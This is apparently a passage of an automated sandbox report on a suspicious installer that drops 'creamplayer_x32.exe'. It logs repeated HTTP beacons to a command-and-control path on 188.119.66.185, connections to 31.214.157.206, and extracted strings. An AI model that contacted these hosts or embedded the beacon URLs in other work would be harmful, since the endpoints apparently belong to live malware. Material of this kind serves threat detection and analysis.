                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeCode function: 5_2_02D42B95 WSASetLastError,WSARecv,WSASetLastError,select,5_2_02D42B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.drString found in binary or memory: http://www.innosetup.com/
                    Source: bzX2pV3Ybw.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: bzX2pV3Ybw.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/-
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/3
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/4
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/:
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/C
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ECDB288DE53FB0A3EE059080EF4409BC0D96FBCi
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/J
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/Q
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/V
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/g
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/mCertificates
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/n
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                    Source: creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                    Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/u
                    Source: bzX2pV3Ybw.exe, 00000000.00000003.1352721583.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1352806549.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000002.2614892365.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355047520.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355124435.0000000002128000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614915917.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2615261275.0000000002128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
